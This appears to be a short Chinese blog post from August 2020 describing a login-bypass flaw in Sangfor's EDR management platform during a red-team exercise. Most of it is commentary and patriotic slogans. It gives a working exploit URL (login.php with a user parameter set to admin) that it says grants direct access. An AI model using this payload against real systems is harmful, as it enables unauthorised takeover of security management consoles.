可能大家都有所耳闻,行动结束了。
当时是众说纷纭,有说甲方扛不住的,有说是红方的钓鱼信息的。刚开始我也以为是红队故意发的消息。
还有民间传言,各方猜测,各位吃瓜群众简直是云里雾里,到现在仍然是未知。
可是,这并不影响大佬们对此次HW行动的神级操作。
就在今天(2020.8.20)凌晨左右(高手一般都是在夜深人静的时候行动)!
SXF的设备又。。。。哎,出现幺蛾子了。还是那个熟悉的EDR,老朋友了害。
不多说了,直接上payload:
payload: https://ip/ui/login.php?user=任意发挥
比如说:
payload: https://10.0.0.12/ui/login.php?user=admin
竟然直接可以登录平台!简直是滑天下之大稽。
作为安全公司,内心的千军万马肯定是奔腾而过!
源码上一张大佬的:
吐槽如下:
SXF:
关于此次活动:
1.24字社会主义核心价值观
2.没有网络安全就没有国家安全
3.各界高手、精英统一战线维护国家网络安全。